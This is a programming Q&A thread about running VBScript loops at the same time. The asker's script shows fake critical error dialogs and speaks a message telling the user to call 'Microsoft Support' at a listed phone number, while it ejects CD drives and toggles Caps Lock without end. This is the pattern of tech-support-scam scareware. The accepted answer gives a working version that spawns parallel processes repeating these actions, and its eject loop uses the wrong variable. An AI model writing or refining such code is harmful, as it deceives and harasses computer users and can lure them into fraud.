# How to run two do loops at the same time on VBScript

Tags: vbscript

I'm trying to make it so my code runs 2 do loops at a time so it can run the open disk drive code and spam caps lock code at the same time. Any way I could do this?

```
 Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
x=msgbox("Keyboard error with key CAPS LOCK",0,"Critical Error")
x=msgbox("Error with CD Drive",0,"Critical Error")
Set wshShell =wscript.CreateObject("WScript.Shell")
message= "Critical Disk Drive Error Alert Call Microsoft Support at 0 3 4 4 8 0 0 2 4 0 0 to resolve the issue"
message1= "Caps Lock key Error"
Dim message, sapi
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
sapi.Speak message1



do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
loop
```

Comment: But you don't need a loop to open the disk drive

Comment: Why not just do both actions inside a single loop...?

Comment: Each loop should run in separate process to make them simultaneous: initial script may launch itself with certain argument showing what part of code to be called. Although one loop is enough for that task.

Comment: when i try putting them in the same loop the caps lock only changes everytime the disk drive opens (im a noob with vbs :P)

Answer (score 0, accepted):

Take a look at the below example:

```vb
CheckTask ' always at the begining of the script

LaunchTask "EjectCdRoms" ' friendly keep CD-ROMs opened
LaunchTask "MsgA" ' friendly show the message A
LaunchTask "MsgB" ' friendly show the message B
LaunchTask "Speak" ' friendly speak

' procedures to be launched asynchronously

Sub EjectCdRoms()
    Dim i
    On Error Resume Next
    Do
        With CreateObject("WMPlayer.OCX.7").cdromCollection
            For i = 0 To .Count - 1
                .Item(d).Eject
            Next
        End With
        WScript.Sleep 500
    Loop
End Sub

Sub MsgA()
    Do
        WScript.Sleep 3000
        MsgBox "Critical Disk Drive Error Alert Call Microsoft Support at 03448002400 to resolve the issue", 48, "Blah"
    Loop
End Sub

Sub MsgB()
    Do
        WScript.Sleep 5000
        MsgBox "Caps Lock key Error", 48, "Blah"
    Loop
End Sub

Sub Speak()
    Do
        With CreateObject("SAPI.SpVoice")
            WScript.Sleep 4000
            .Speak "Critical Disk Drive Error Alert Call Microsoft Support at 0 3 4 4 8 0 0 2 4 0 0 to resolve the issue"
            WScript.Sleep 4000
            .Speak "Caps Lock key Error"
        End With
    Loop
End Sub

' utility procedures, do not modify

Sub CheckTask()
    If WScript.Arguments.Named.Exists("task") Then
        On Error Resume Next
        Execute WScript.Arguments.Named.Item("task")
        WScript.Quit
    End If
End Sub

Sub LaunchTask(sTaskName)
    CreateObject("WScript.Shell").Exec """" & WScript.FullName & """ """ & WScript.ScriptFullName & """ ""/task:" & sTaskName & """"
End Sub
```